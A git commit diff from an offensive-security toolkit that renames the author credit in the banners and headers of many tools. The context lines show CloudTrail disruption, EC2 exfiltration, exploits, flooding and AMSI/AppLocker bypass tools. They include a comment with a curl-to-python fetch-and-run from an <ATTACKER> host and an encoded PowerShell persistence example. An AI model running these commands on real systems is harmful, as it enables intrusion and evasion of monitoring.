Mariusz B. / mgeeky 2021-10-24 23:11:42 +02:00
parent 2e115fe796
commit 558762a498
78 changed files with 124 additions and 124 deletions


@ -36,6 +36,6 @@ This and other projects are outcome of sleepless nights and **plenty of hard wor
--- ---
``` ```
Mariusz B. / mgeeky, (@mariuszbit) Mariusz Banach / mgeeky, (@mariuszbit)
<mb [at] binary-offensive.com> <mb [at] binary-offensive.com>
``` ```


@ -33,7 +33,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --help
:: AWS CloudTrail disruption via S3 Put notification to Lambda :: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name] usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name]
@ -64,7 +64,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --access-key ASIAXXXXXXXXXXXXXXXX
:: AWS CloudTrail disruption via S3 Put notification to Lambda :: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
[.] Will be working on Account ID: 712800000000 [.] Will be working on Account ID: 712800000000
[.] Step 1: Determine trail to disrupt [.] Step 1: Determine trail to disrupt
@ -181,7 +181,7 @@ attacker $ python3 ./exfiltrate-ec2.py --help
:: exfiltrate-ec2 :: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE] usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE]
[--access-key ACCESS_KEY] [--secret-key SECRET_KEY] [--access-key ACCESS_KEY] [--secret-key SECRET_KEY]
@ -236,7 +236,7 @@ attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default -
:: exfiltrate-ec2 :: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
[.] Using attacker's profile: default [.] Using attacker's profile: default
[.] Using victim's profile: victim-profile [.] Using victim's profile: victim-profile


@ -3,7 +3,7 @@
# This script simply calls `aws sts assume-role` using hardcoded parameters, in order # This script simply calls `aws sts assume-role` using hardcoded parameters, in order
# to retrieve set of session credentials and reformat it into ~/.aws/credentials file format. # to retrieve set of session credentials and reformat it into ~/.aws/credentials file format.
# #
# Mariusz B., mgeeky '19-20 # Mariusz Banach, mgeeky '19-20
# #


@ -38,7 +38,7 @@
# - boto3 # - boto3
# - pytest # - pytest
# #
# Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com> # Author: Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
# #
@ -427,7 +427,7 @@ def parseOptions(argv):
print(''' print('''
:: AWS CloudTrail disruption via S3 Put notification to Lambda :: AWS CloudTrail disruption via S3 Put notification to Lambda
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
''') ''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]')


@ -5,7 +5,7 @@
# policy statements. Then goes through allowed permissions to pick all of them out. # policy statements. Then goes through allowed permissions to pick all of them out.
# Finally, checks every allowed permission against a list of known troublesome ones. # Finally, checks every allowed permission against a list of known troublesome ones.
# #
# Mariusz B., mgeeky '19, <mb@binary-offensive.com> # Mariusz Banach, mgeeky '19, <mb@binary-offensive.com>
# v0.1 # v0.1
# #


@ -33,7 +33,7 @@
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is # WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
# not recommended to use it during legal AWS Penetration Tests # not recommended to use it during legal AWS Penetration Tests
# #
# Author: Mariusz B. / mgeeky, '19, <mb@binary-offensive.com> # Author: Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
# #
import sys import sys
@ -422,7 +422,7 @@ def parseOptions(argv):
print(''' print('''
:: exfiltrate-ec2 :: exfiltrate-ec2
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
''') ''')
parser = argparse.ArgumentParser(prog = argv[0]) parser = argparse.ArgumentParser(prog = argv[0])


@ -9,7 +9,7 @@
# #
# $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python # $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
# #
# Author: Mariusz B., '19, <mb@binary-offensive.com> # Author: Mariusz Banach, '19, <mb@binary-offensive.com>
# #
import zipfile, StringIO import zipfile, StringIO


@ -3,7 +3,7 @@
# This script leverages couple of methods in order to validate that passed # This script leverages couple of methods in order to validate that passed
# domain is a S3 bucket indeed. # domain is a S3 bucket indeed.
# #
# Mariusz B., 2019, <mb@binary-offensive.com> # Mariusz Banach, 2019, <mb@binary-offensive.com>
# #
require 'resolv' require 'resolv'
@ -245,7 +245,7 @@ def main(args)
puts %{ puts %{
:: Identifies AWS S3 Buckets via couple of methods :: Identifies AWS S3 Buckets via couple of methods
Mariusz B. 19', <mb@binary-offensive.com> Mariusz Banach 19', <mb@binary-offensive.com>
} }
if ARGV.length != 1 if ARGV.length != 1


@ -20,7 +20,7 @@
# Requirements: # Requirements:
# - gem "aws-sdk-ec2" # - gem "aws-sdk-ec2"
# #
# Author: Mariusz B., '19, <mb@binary-offensive.com> # Author: Mariusz Banach, '19, <mb@binary-offensive.com>
# #
require 'aws-sdk-ec2' require 'aws-sdk-ec2'


@ -8,7 +8,7 @@ c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
:: tamperUpx - a small utility that corrupts UPX-packed executables, :: tamperUpx - a small utility that corrupts UPX-packed executables,
making them much harder to be decompressed & restored. making them much harder to be decompressed & restored.
Mariusz B. / mgeeky, '21 Mariusz Banach / mgeeky, '21
Step 1. Renaming UPX sections... Step 1. Renaming UPX sections...
Renamed UPX section (UPX0 ) => (.text) Renamed UPX section (UPX0 ) => (.text)


@ -119,7 +119,7 @@ def main(argv):
:: tamperUpx - a small utility that corrupts UPX-packed executables, :: tamperUpx - a small utility that corrupts UPX-packed executables,
making them much harder to be decompressed & restored. making them much harder to be decompressed & restored.
Mariusz B. / mgeeky, '21 Mariusz Banach / mgeeky, '21
''') ''')
if len(argv) < 2: if len(argv) < 2:


@ -1,7 +1,7 @@
#!/bin/bash #!/bin/bash
# #
# OpenVAS automation script. # OpenVAS automation script.
# Mariusz B. / mgeeky, '17 # Mariusz Banach / mgeeky, '17
# v0.2 # v0.2
# #


@ -13,7 +13,7 @@
# keeping tools list more or less up-to-date, or to remove tool's pull down entirely from the script # keeping tools list more or less up-to-date, or to remove tool's pull down entirely from the script
# - only tools that I've found useful at least once are landing in this script. # - only tools that I've found useful at least once are landing in this script.
# #
# Mariusz B., '18-'19 # Mariusz Banach, '18-'19
# #
# Well, entire Kali installation assume that we are normally working as root on our Kali. # Well, entire Kali installation assume that we are normally working as root on our Kali.


@ -8,7 +8,7 @@
# Python requirements: # Python requirements:
# - scapy # - scapy
# #
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
# #
import sys import sys
@ -202,7 +202,7 @@ def parseOptions(argv):
print(''' print('''
:: CDP Flooding / Denial of Service tool :: CDP Flooding / Denial of Service tool
Floods the interface with fake, randomly generated CDP packets. Floods the interface with fake, randomly generated CDP packets.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))


@ -6,7 +6,7 @@
# Python requirements: # Python requirements:
# - scapy # - scapy
# #
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
# #
import sys import sys
@ -122,7 +122,7 @@ def parseOptions(argv):
print(''' print('''
:: HSRP Flooding / Denial of Service tool :: HSRP Flooding / Denial of Service tool
Floods the interface with Active router Coup HSRP packets. Floods the interface with Active router Coup HSRP packets.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))


@ -33,7 +33,7 @@ PS D:\> python3 .\exchangeRecon.py 10.10.10.9
:: Exchange Fingerprinter :: Exchange Fingerprinter
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.2 v0.2
[.] Probing for Exchange fingerprints... [.] Probing for Exchange fingerprints...
@ -141,7 +141,7 @@ bash $ python RoutingAttackKit.py
:: Routing Protocols Exploitation toolkit :: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.1 v0.1
Available attacks: Available attacks:
@ -157,7 +157,7 @@ bash # python RoutingAttackKit.py -t rip-fuzzer -v
:: Routing Protocols Exploitation toolkit :: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v0.1 v0.1
[.] Using 192.168.1.14 as local/spoof IP address [.] Using 192.168.1.14 as local/spoof IP address
@ -241,7 +241,7 @@ $ ./VLANHopperDTP.py --help
:: VLAN Hopping via DTP Trunk negotiation :: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky, '18 Mariusz Banach / mgeeky, '18
v0.3 v0.3
usage: ./VLANHopperDTP.py [options] usage: ./VLANHopperDTP.py [options]
@ -279,7 +279,7 @@ $ sudo ./VLANHopperDTP.py -i enp5s0f1
:: VLAN Hopping via DTP Trunk negotiation :: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky, '18 Mariusz Banach / mgeeky, '18
v0.2 v0.2
[+] VLAN Hopping IS possible. [+] VLAN Hopping IS possible.


@ -13,7 +13,7 @@
# Python requirements: # Python requirements:
# - scapy # - scapy
# #
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
# #
import sys import sys
@ -618,7 +618,7 @@ def parseOptions(argv):
print(''' print('''
:: Routing Protocols Exploitation toolkit :: Routing Protocols Exploitation toolkit
Sends out various routing protocols management frames Sends out various routing protocols management frames
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))


@ -39,7 +39,7 @@
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory # - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
# - Add functionality to auto-scan via arp-scan desired network # - Add functionality to auto-scan via arp-scan desired network
# #
# Mariusz B. / mgeeky, '18-19, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, '18-19, <mb@binary-offensive.com>
# #
import os import os
@ -724,7 +724,7 @@ def parseOptions(argv):
print(''' print('''
:: VLAN Hopping via DTP Trunk negotiation :: VLAN Hopping via DTP Trunk negotiation
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
Mariusz B. / mgeeky '18-19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '18-19, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))


@ -5,7 +5,7 @@
# the switch's port. This reconessaince will be helpful for performing # the switch's port. This reconessaince will be helpful for performing
# VLAN Hopping attacks. # VLAN Hopping attacks.
# #
# Mariusz B. / mgeeky, '18 # Mariusz Banach / mgeeky, '18
# #
import os import os


@ -32,7 +32,7 @@
# - packaging # - packaging
# #
# Author: # Author:
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
# #
import re import re
@ -1300,7 +1300,7 @@ def parseOptions(argv):
print(''' print('''
:: Exchange Fingerprinter :: Exchange Fingerprinter
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
Mariusz B. / mgeeky '19, <mb@binary-offensive.com> Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))


@ -6,7 +6,7 @@
# #
# Based on "Black Hat Python" book by Justin Seitz. # Based on "Black Hat Python" book by Justin Seitz.
# #
# Mariusz B. # Mariusz Banach
# #
import os import os


@ -51,7 +51,7 @@ if __name__ == '__main__':
print '\n\tMicrosoft IIS WebDAV Write Code Execution exploit' print '\n\tMicrosoft IIS WebDAV Write Code Execution exploit'
print '\t(based on Metasploit HDM\'s <iis_webdav_upload_asp> implementation)' print '\t(based on Metasploit HDM\'s <iis_webdav_upload_asp> implementation)'
print '\tMariusz B. / mgeeky, 2016\n' print '\tMariusz Banach / mgeeky, 2016\n'
host = sys.argv[1] host = sys.argv[1]
if not host.startswith('http'): if not host.startswith('http'):


@ -25,7 +25,7 @@
# Requirements: # Requirements:
# - paramiko # - paramiko
# #
# Mariusz B. / mgeeky, <mb@binary-offensive.com> # Mariusz Banach / mgeeky, <mb@binary-offensive.com>
# #
import sys import sys
@ -360,7 +360,7 @@ def main():
sys.stderr.write(''' sys.stderr.write('''
:: CVE-2018-10993 libSSH authentication bypass exploit. :: CVE-2018-10993 libSSH authentication bypass exploit.
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication. Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com> Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{} v{}
'''.format(VERSION)) '''.format(VERSION))


@ -5,7 +5,7 @@
# configuration files in order to extract plain and cipher passwords out of them. # configuration files in order to extract plain and cipher passwords out of them.
# Equipped with functionality to decrypt Cisco Type 7 passwords. # Equipped with functionality to decrypt Cisco Type 7 passwords.
# #
# Mariusz B., mgeeky '18-20 # Mariusz Banach, mgeeky '18-20
# #
import re import re
@ -427,7 +427,7 @@ def printResults():
def main(argv): def main(argv):
Logger._out(''' Logger._out('''
:: Network-configuration Credentials extraction script :: Network-configuration Credentials extraction script
Mariusz B. / mgeeky, '18 Mariusz Banach / mgeeky, '18
''') ''')
opts = parseOptions(argv) opts = parseOptions(argv)
if not opts: if not opts:


@ -72,7 +72,7 @@
# - Microsoft Exchange Server 2013 # - Microsoft Exchange Server 2013
# #
# Author: # Author:
# Mariusz B. / mgeeky, '17-19, # Mariusz Banach / mgeeky, '17-19,
# <mb@binary-offensive.com> # <mb@binary-offensive.com>
# #
@ -2958,7 +2958,7 @@ Date: {dateNow}
smtpAudit.py ({VERSION}) - SMTP Server penetration testing / audit tool, smtpAudit.py ({VERSION}) - SMTP Server penetration testing / audit tool,
(https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa) (https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa)
by Mariusz B. / mgeeky (<mb@binary-offensive.com>) by Mariusz Banach / mgeeky (<mb@binary-offensive.com>)
. .
''' '''
@ -3698,7 +3698,7 @@ class ParseOptions:
def banner(): def banner():
sys.stderr.write(''' sys.stderr.write('''
:: SMTP Black-Box Audit tool. :: SMTP Black-Box Audit tool.
v{}, Mariusz B. / mgeeky, '17 v{}, Mariusz Banach / mgeeky, '17
'''.format(VERSION)) '''.format(VERSION))
@ -3828,7 +3828,7 @@ def main(argv):
sys.stderr.write(''' sys.stderr.write('''
:: SMTP configuration Audit / Penetration-testing tool :: SMTP configuration Audit / Penetration-testing tool
Intended to be used as a black-box tool revealing security state of SMTP. Intended to be used as a black-box tool revealing security state of SMTP.
Mariusz B. / mgeeky, '17-19 Mariusz Banach / mgeeky, '17-19
v{} v{}
'''.format(VERSION)) '''.format(VERSION))


@ -3,7 +3,7 @@
# Simple script intended to abuse SMTP server's VRFY command to leak # Simple script intended to abuse SMTP server's VRFY command to leak
# usernames having accounts registered within it. # usernames having accounts registered within it.
# #
# Mariusz B., 2016 # Mariusz Banach, 2016
# #
import socket import socket


@ -7,7 +7,7 @@
# Nothing fancy, just set of needed commands. Especially handy when # Nothing fancy, just set of needed commands. Especially handy when
# used with `startEAPHammer.sh` script. # used with `startEAPHammer.sh` script.
# #
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
# #
if [ $# -ne 2 ]; then if [ $# -ne 2 ]; then


@ -5,7 +5,7 @@
# that takes as input list of APs against which should deauth be launched, # that takes as input list of APs against which should deauth be launched,
# and then attempts that attack. # and then attempts that attack.
# #
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
# #
if [ $# -ne 1 ]; then if [ $# -ne 1 ]; then


@ -14,7 +14,7 @@
# Especially handy when used with companion script called: # Especially handy when used with companion script called:
# `initDHCPServer.sh` # `initDHCPServer.sh`
# #
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com> # Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
# #
#################################################################### ####################################################################


@ -5,7 +5,7 @@ Create Contoso Users in Active Directory This script creates 270 + users in Acti
***Original Author: Mark Rhodes - markrhodes@gmail.com - @mrhodes*** ***Original Author: Mark Rhodes - markrhodes@gmail.com - @mrhodes***
***Modified by: Mariusz B., mb@binary-offensive.com - @mgeeky*** ***Modified by: Mariusz Banach, mb@binary-offensive.com - @mgeeky***
**To Use:** **To Use:**
Extract all files and run Create-ADStructure.ps1 from an Administrative PowerShell prompt. Extract all files and run Create-ADStructure.ps1 from an Administrative PowerShell prompt.


@ -3,7 +3,7 @@
# with incoming OBEX Object Push requests containing # with incoming OBEX Object Push requests containing
# specified file. # specified file.
# #
# Mariusz B. / MGeeky, 16' # Mariusz Banach / MGeeky, 16'
# #
# Partially based on `Violent Python` snippets. # Partially based on `Violent Python` snippets.
# Modules required: # Modules required:
@ -79,7 +79,7 @@ def main():
parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly') parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly')
print '\nBluetooth file carpet bombing via OBEX Object Push' print '\nBluetooth file carpet bombing via OBEX Object Push'
print 'Mariusz B. / MGeeky 16\n' print 'Mariusz Banach / MGeeky 16\n'
(opts, args) = parser.parse_args() (opts, args) = parser.parse_args()


@ -14,7 +14,7 @@
# WILL RETURN: # WILL RETURN:
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123 # some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123
# #
# Mariusz B. / mgeeky # Mariusz Banach / mgeeky
# #
import sys, os import sys, os


@ -4,7 +4,7 @@
# In latter case producing encrypted ZIP package that will get decompressed automatically # In latter case producing encrypted ZIP package that will get decompressed automatically
# after decryption. # after decryption.
# #
# Mariusz B., 2016 v0.1 # Mariusz Banach, 2016 v0.1
# #
require 'optparse' require 'optparse'


@ -11,7 +11,7 @@
# - scanning for other VMs # - scanning for other VMs
# - setting selected VM's IP address within /etc/hosts (and alike) file # - setting selected VM's IP address within /etc/hosts (and alike) file
# #
# Mariusz B. / mgeeky, '16-'19 # Mariusz Banach / mgeeky, '16-'19
# v0.7 # v0.7
# #


@ -3,7 +3,7 @@
# Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length # Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length
# it searches for proper key that could decrypt cipher into text. # it searches for proper key that could decrypt cipher into text.
# #
# Mariusz B., 2016 # Mariusz Banach, 2016
# #
import sys import sys


@ -15,7 +15,7 @@
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater") ' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
' '
' AUTHOR: ' AUTHOR:
' Mariusz B. / mgeeky, '17 ' Mariusz Banach / mgeeky, '17
' '
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean


@ -45,7 +45,7 @@
# - packaging # - packaging
# - dnspython # - dnspython
# #
# Mariusz B. / mgeeky, '21 # Mariusz Banach / mgeeky, '21
# <mb [at] binary-offensive.com> # <mb [at] binary-offensive.com>
# #


@ -37,7 +37,7 @@ PS > py .\gophish-send-mail.py .\send-mail-with-gophish.yaml
:: GoPhish Single Mail Send utility :: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky Mariusz Banach / mgeeky
[+] Template to use: [+] Template to use:
ID: 22 ID: 22


@ -165,7 +165,7 @@ def main(argv):
print(''' print('''
:: GoPhish Single Mail Send utility :: GoPhish Single Mail Send utility
Helping you embellish your emails by sending them one-by-one Helping you embellish your emails by sending them one-by-one
Mariusz B. / mgeeky Mariusz Banach / mgeeky
''') ''')
template = getTemplate() template = getTemplate()


@ -205,7 +205,7 @@ def main(argv):
print(''' print('''
:: Phishing HTML Linter :: Phishing HTML Linter
Shows you bad smells in your HTML code that will get your mails busted! Shows you bad smells in your HTML code that will get your mails busted!
Mariusz B. / mgeeky Mariusz Banach / mgeeky
''') ''')
html = '' html = ''


@ -19,7 +19,7 @@
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater" ' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
' '
' AUTHOR: ' AUTHOR:
' Mariusz B. / mgeeky, '17 ' Mariusz Banach / mgeeky, '17
' '
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean


@ -100,7 +100,7 @@ function Bypass-CLM
Write-Host "`tAppLocker Constrined Language Mode Bypass via COM" Write-Host "`tAppLocker Constrined Language Mode Bypass via COM"
Write-Host "`t(implementation of: @xpn's technique, as documented in:)" Write-Host "`t(implementation of: @xpn's technique, as documented in:)"
Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)" Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)"
Write-Host "`n`tRe-implemented, enhanced by: Mariusz B., mgeeky" Write-Host "`n`tRe-implemented, enhanced by: Mariusz Banach, mgeeky"
Write-Host "`t-----`n" Write-Host "`t-----`n"
Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath" Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath"



@ -2,7 +2,7 @@
* This DLL hosts CLR4 environment from within a native binary. This way it is possible to * This DLL hosts CLR4 environment from within a native binary. This way it is possible to
* call .NET APIs from an unmanaged runtime. * call .NET APIs from an unmanaged runtime.
* *
* Mariusz B., mgeeky, 19' * Mariusz Banach, mgeeky, 19'
* *
**/ **/


@ -26,7 +26,7 @@ PS > .\Bypass-CLM.ps1
(implementation of: @xpn's technique, as documented in:) (implementation of: @xpn's technique, as documented in:)
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/) (https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
Re-implemented, enhanced by: Mariusz B., mgeeky Re-implemented, enhanced by: Mariusz Banach, mgeeky
----- -----
[.] Step 0. Planted DLL files in: [.] Step 0. Planted DLL files in:


@ -22,7 +22,7 @@ The script offers subcommands-kind of CLI interface, so after every command one
PS> py .\c3-client.py --help PS> py .\c3-client.py --help
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage: usage:
Usage: ./c3-client.py [options] <host> <command> [...] Usage: ./c3-client.py [options] <host> <command> [...]
@ -59,7 +59,7 @@ optional arguments:
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay --help PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay --help
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage: Usage: ./c3-client.py [options] <host> <command> [...] alarm relay [-h] [-e EXECUTE] [-x WEBHOOK] [-g gateway_id] usage: Usage: ./c3-client.py [options] <host> <command> [...] alarm relay [-h] [-e EXECUTE] [-x WEBHOOK] [-g gateway_id]
@ -144,7 +144,7 @@ This example shows how to keep all of your Relays pinged every 45 seconds:
PS D:\> py c3-client.py http://192.168.0.200:52935 ping -k 45 PS D:\> py c3-client.py http://192.168.0.200:52935 ping -k 45
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] Sending a ping every 45 seconds. [.] Sending a ping every 45 seconds.
[.] Pinged relay: matter4 from gateway gate4 [.] Pinged relay: matter4 from gateway gate4
@ -170,7 +170,7 @@ Ever suffered from a poor C3 bandwidth or general performance? Worry not - you c
PS D:\> py .\c3-client.py http://192.168.0.200:52935 channel all clear PS D:\> py .\c3-client.py http://192.168.0.200:52935 channel all clear
:: C3 Client - a lightweight automated companion with C3 voyages :: C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] LDAP: Clearing messages queue... [.] LDAP: Clearing messages queue...
[+] Cleared LDAP attribute value on C3 channel 3 on Relay matter4 on gateway gate4 [+] Cleared LDAP attribute value on C3 channel 3 on Relay matter4 on gateway gate4
@ -213,7 +213,7 @@ In this example setup an alarm that triggers upon new Relay checking-in. Wheneve
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay -g gate4 --execute "powershell -file speak.ps1 -message \`"New C3 Relay Inbound: <domain>/<userName>, computer: <computerName>\`"" PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay -g gate4 --execute "powershell -file speak.ps1 -message \`"New C3 Relay Inbound: <domain>/<userName>, computer: <computerName>\`""
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[.] Entering infinite-loop awaiting for new Relays... [.] Entering infinite-loop awaiting for new Relays...
[+] New Relay checked-in! [+] New Relay checked-in!
@ -325,6 +325,6 @@ py c3-client.py http://192.168.0.200:52935 ping -k 45
## Author ## Author
``` ```
Mariusz B. / mgeeky, '21 Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com> <mb [at] binary-offensive.com>
``` ```


@ -2036,7 +2036,7 @@ def parseArgs(argv):
def main(argv): def main(argv):
print(''' print('''
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
Mariusz B. / mgeeky, <mb@binary-offensive.com> Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''') ''')
parseArgs(argv) parseArgs(argv)


@ -8,7 +8,7 @@
PS> . .\Count-PrivilegedGroupMembers.ps1 PS> . .\Count-PrivilegedGroupMembers.ps1
PS> Count-PrivilegedGroupMembers PS> Count-PrivilegedGroupMembers
Mariusz B. / mgeeky Mariusz Banach / mgeeky
#> #>
# This script requires PowerView 3.0 dev branch # This script requires PowerView 3.0 dev branch


@ -5,7 +5,7 @@
Attempts to disable AMSI within current process using well-known techniques laid out in an unsignatured way. Attempts to disable AMSI within current process using well-known techniques laid out in an unsignatured way.
Author: Mariusz B. (@mgeeky) Author: Mariusz Banach (@mgeeky)
License: BSD 3-Clause License: BSD 3-Clause
